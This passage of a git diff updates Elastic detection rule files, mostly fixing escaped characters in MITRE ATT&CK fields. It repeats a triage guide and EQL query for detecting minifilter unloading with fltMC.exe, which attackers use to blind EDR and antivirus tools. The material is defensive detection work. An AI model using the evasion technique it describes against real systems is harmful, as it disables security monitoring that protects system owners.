diff --git a/packages/security_detection_engine/kibana/security_rule/06568a02-af29-4f20-929c-f3af281e41aa_2.json b/packages/security_detection_engine/kibana/security_rule/06568a02-af29-4f20-929c-f3af281e41aa_2.json
index ffad3f3de8f..4e10e5e8e0f 100644
--- a/packages/security_detection_engine/kibana/security_rule/06568a02-af29-4f20-929c-f3af281e41aa_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/06568a02-af29-4f20-929c-f3af281e41aa_2.json
@@ -70,7 +70,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/06568a02-af29-4f20-929c-f3af281e41aa_3.json b/packages/security_detection_engine/kibana/security_rule/06568a02-af29-4f20-929c-f3af281e41aa_3.json
index 8c01a723806..05ce1ffc265 100644
--- a/packages/security_detection_engine/kibana/security_rule/06568a02-af29-4f20-929c-f3af281e41aa_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/06568a02-af29-4f20-929c-f3af281e41aa_3.json
@@ -69,7 +69,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/06568a02-af29-4f20-929c-f3af281e41aa_4.json b/packages/security_detection_engine/kibana/security_rule/06568a02-af29-4f20-929c-f3af281e41aa_4.json
index d07984573d2..dd005d8d1ab 100644
--- a/packages/security_detection_engine/kibana/security_rule/06568a02-af29-4f20-929c-f3af281e41aa_4.json
+++ b/packages/security_detection_engine/kibana/security_rule/06568a02-af29-4f20-929c-f3af281e41aa_4.json
@@ -70,7 +70,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/06568a02-af29-4f20-929c-f3af281e41aa_5.json b/packages/security_detection_engine/kibana/security_rule/06568a02-af29-4f20-929c-f3af281e41aa_5.json
index 0dfc2539e0c..9c79e75d8aa 100644
--- a/packages/security_detection_engine/kibana/security_rule/06568a02-af29-4f20-929c-f3af281e41aa_5.json
+++ b/packages/security_detection_engine/kibana/security_rule/06568a02-af29-4f20-929c-f3af281e41aa_5.json
@@ -72,7 +72,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/0678bc9c-b71a-433b-87e6-2f664b6b3131_1.json b/packages/security_detection_engine/kibana/security_rule/0678bc9c-b71a-433b-87e6-2f664b6b3131_1.json
index 4d47fc8b7d3..bfe44dc1bbd 100644
--- a/packages/security_detection_engine/kibana/security_rule/0678bc9c-b71a-433b-87e6-2f664b6b3131_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/0678bc9c-b71a-433b-87e6-2f664b6b3131_1.json
@@ -33,7 +33,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/06a7a03c-c735-47a6-a313-51c354aef6c3_2.json b/packages/security_detection_engine/kibana/security_rule/06a7a03c-c735-47a6-a313-51c354aef6c3_2.json
index 152dea4df11..3435db47c37 100644
--- a/packages/security_detection_engine/kibana/security_rule/06a7a03c-c735-47a6-a313-51c354aef6c3_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/06a7a03c-c735-47a6-a313-51c354aef6c3_2.json
@@ -62,7 +62,7 @@
 ],
 "risk_score": 21,
 "rule_id": "06a7a03c-c735-47a6-a313-51c354aef6c3",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "low",
 "tags": [
 "Elastic",
@@ -74,7 +74,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/06a7a03c-c735-47a6-a313-51c354aef6c3_3.json b/packages/security_detection_engine/kibana/security_rule/06a7a03c-c735-47a6-a313-51c354aef6c3_3.json
index 87ae857fe60..1526a53d712 100644
--- a/packages/security_detection_engine/kibana/security_rule/06a7a03c-c735-47a6-a313-51c354aef6c3_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/06a7a03c-c735-47a6-a313-51c354aef6c3_3.json
@@ -62,7 +62,7 @@
 ],
 "risk_score": 21,
 "rule_id": "06a7a03c-c735-47a6-a313-51c354aef6c3",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "low",
 "tags": [
 "Domain: Endpoint",
@@ -73,7 +73,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/06a7a03c-c735-47a6-a313-51c354aef6c3_4.json b/packages/security_detection_engine/kibana/security_rule/06a7a03c-c735-47a6-a313-51c354aef6c3_4.json
index 83d602c92fc..9343b2dd18e 100644
--- a/packages/security_detection_engine/kibana/security_rule/06a7a03c-c735-47a6-a313-51c354aef6c3_4.json
+++ b/packages/security_detection_engine/kibana/security_rule/06a7a03c-c735-47a6-a313-51c354aef6c3_4.json
@@ -73,7 +73,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/06a7a03c-c735-47a6-a313-51c354aef6c3_5.json b/packages/security_detection_engine/kibana/security_rule/06a7a03c-c735-47a6-a313-51c354aef6c3_5.json
index 1e155615374..a45aefeccdf 100644
--- a/packages/security_detection_engine/kibana/security_rule/06a7a03c-c735-47a6-a313-51c354aef6c3_5.json
+++ b/packages/security_detection_engine/kibana/security_rule/06a7a03c-c735-47a6-a313-51c354aef6c3_5.json
@@ -74,7 +74,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/06dceabf-adca-48af-ac79-ffdf4c3b1e9a_104.json b/packages/security_detection_engine/kibana/security_rule/06dceabf-adca-48af-ac79-ffdf4c3b1e9a_104.json
index 2061ea99e3d..12146ad735f 100644
--- a/packages/security_detection_engine/kibana/security_rule/06dceabf-adca-48af-ac79-ffdf4c3b1e9a_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/06dceabf-adca-48af-ac79-ffdf4c3b1e9a_104.json
@@ -50,7 +50,7 @@
 ],
 "risk_score": 47,
 "rule_id": "06dceabf-adca-48af-ac79-ffdf4c3b1e9a",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/06dceabf-adca-48af-ac79-ffdf4c3b1e9a_105.json b/packages/security_detection_engine/kibana/security_rule/06dceabf-adca-48af-ac79-ffdf4c3b1e9a_105.json
index af0d378bc72..ca49e74b356 100644
--- a/packages/security_detection_engine/kibana/security_rule/06dceabf-adca-48af-ac79-ffdf4c3b1e9a_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/06dceabf-adca-48af-ac79-ffdf4c3b1e9a_105.json
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Evasion via Filter Manager", - "note": "## Triage and analysis\n\n### Investigating Potential Evasion via Filter Manager\n\nA file system filter driver, or minifilter, is a specialized type of filter driver designed to intercept and modify I/O requests sent to a file system or another filter driver. Minifilters are used by a wide range of security software, including EDR, antivirus, backup agents, encryption products, etc.\n\nAttackers may try to unload minifilters to avoid protections such as malware detection, file system monitoring, and behavior-based detections.\n\nThis rule identifies the attempt to unload a minifilter using the `fltmc.exe` command-line utility, a tool used to manage and query the filter drivers loaded on Windows systems.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Examine the command line event to identify the target driver.\n - Identify the minifilter's role in the environment and if it is security-related. Microsoft provides a [list](https://learn.microsoft.com/en-us/windows-hardware/drivers/ifs/allocated-altitudes) of allocated altitudes that may provide more context, such as the manufacturer.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False 
positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the administrator is aware of the activity and there are justifications for the action.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Potential Evasion via Filter Manager\n\nA file system filter driver, or minifilter, is a specialized type of filter driver designed to intercept and modify I/O requests sent to a file system or another filter driver. 
Minifilters are used by a wide range of security software, including EDR, antivirus, backup agents, encryption products, etc.\n\nAttackers may try to unload minifilters to avoid protections such as malware detection, file system monitoring, and behavior-based detections.\n\nThis rule identifies the attempt to unload a minifilter using the `fltmc.exe` command-line utility, a tool used to manage and query the filter drivers loaded on Windows systems.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Examine the command line event to identify the target driver.\n - Identify the minifilter's role in the environment and if it is security-related. Microsoft provides a [list](https://learn.microsoft.com/en-us/windows-hardware/drivers/ifs/allocated-altitudes) of allocated altitudes that may provide more context, such as the manufacturer.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False 
positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the administrator is aware of the activity and there are justifications for the action.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : \"fltMC.exe\" and process.args : \"unload\"\n", "related_integrations": [ { @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", 
diff --git a/packages/security_detection_engine/kibana/security_rule/06dceabf-adca-48af-ac79-ffdf4c3b1e9a_106.json b/packages/security_detection_engine/kibana/security_rule/06dceabf-adca-48af-ac79-ffdf4c3b1e9a_106.json
index 3dca64ec2c6..cbfa318dbff 100644
--- a/packages/security_detection_engine/kibana/security_rule/06dceabf-adca-48af-ac79-ffdf4c3b1e9a_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/06dceabf-adca-48af-ac79-ffdf4c3b1e9a_106.json
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Evasion via Filter Manager", - "note": "## Triage and analysis\n\n### Investigating Potential Evasion via Filter Manager\n\nA file system filter driver, or minifilter, is a specialized type of filter driver designed to intercept and modify I/O requests sent to a file system or another filter driver. Minifilters are used by a wide range of security software, including EDR, antivirus, backup agents, encryption products, etc.\n\nAttackers may try to unload minifilters to avoid protections such as malware detection, file system monitoring, and behavior-based detections.\n\nThis rule identifies the attempt to unload a minifilter using the `fltmc.exe` command-line utility, a tool used to manage and query the filter drivers loaded on Windows systems.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Examine the command line event to identify the target driver.\n - Identify the minifilter's role in the environment and if it is security-related. Microsoft provides a [list](https://learn.microsoft.com/en-us/windows-hardware/drivers/ifs/allocated-altitudes) of allocated altitudes that may provide more context, such as the manufacturer.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False 
positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the administrator is aware of the activity and there are justifications for the action.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Potential Evasion via Filter Manager\n\nA file system filter driver, or minifilter, is a specialized type of filter driver designed to intercept and modify I/O requests sent to a file system or another filter driver. 
Minifilters are used by a wide range of security software, including EDR, antivirus, backup agents, encryption products, etc.\n\nAttackers may try to unload minifilters to avoid protections such as malware detection, file system monitoring, and behavior-based detections.\n\nThis rule identifies the attempt to unload a minifilter using the `fltmc.exe` command-line utility, a tool used to manage and query the filter drivers loaded on Windows systems.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Examine the command line event to identify the target driver.\n - Identify the minifilter's role in the environment and if it is security-related. Microsoft provides a [list](https://learn.microsoft.com/en-us/windows-hardware/drivers/ifs/allocated-altitudes) of allocated altitudes that may provide more context, such as the manufacturer.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False 
positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the administrator is aware of the activity and there are justifications for the action.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : \"fltMC.exe\" and process.args : \"unload\"\n", "related_integrations": [ { @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", 
diff --git a/packages/security_detection_engine/kibana/security_rule/06dceabf-adca-48af-ac79-ffdf4c3b1e9a_107.json b/packages/security_detection_engine/kibana/security_rule/06dceabf-adca-48af-ac79-ffdf4c3b1e9a_107.json
index bd6632229d4..8149f628b16 100644
--- a/packages/security_detection_engine/kibana/security_rule/06dceabf-adca-48af-ac79-ffdf4c3b1e9a_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/06dceabf-adca-48af-ac79-ffdf4c3b1e9a_107.json
@@ -14,7 +14,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Potential Evasion via Filter Manager",
- "note": "## Triage and analysis\n\n### Investigating Potential Evasion via Filter Manager\n\nA file system filter driver, or minifilter, is a specialized type of filter driver designed to intercept and modify I/O requests sent to a file system or another filter driver. Minifilters are used by a wide range of security software, including EDR, antivirus, backup agents, encryption products, etc.\n\nAttackers may try to unload minifilters to avoid protections such as malware detection, file system monitoring, and behavior-based detections.\n\nThis rule identifies the attempt to unload a minifilter using the `fltmc.exe` command-line utility, a tool used to manage and query the filter drivers loaded on Windows systems.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Examine the command line event to identify the target driver.\n - Identify the minifilter's role in the environment and if it is security-related. Microsoft provides a [list](https://learn.microsoft.com/en-us/windows-hardware/drivers/ifs/allocated-altitudes) of allocated altitudes that may provide more context, such as the manufacturer.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False 
positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the administrator is aware of the activity and there are justifications for the action.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Potential Evasion via Filter Manager\n\nA file system filter driver, or minifilter, is a specialized type of filter driver designed to intercept and modify I/O requests sent to a file system or another filter driver. 
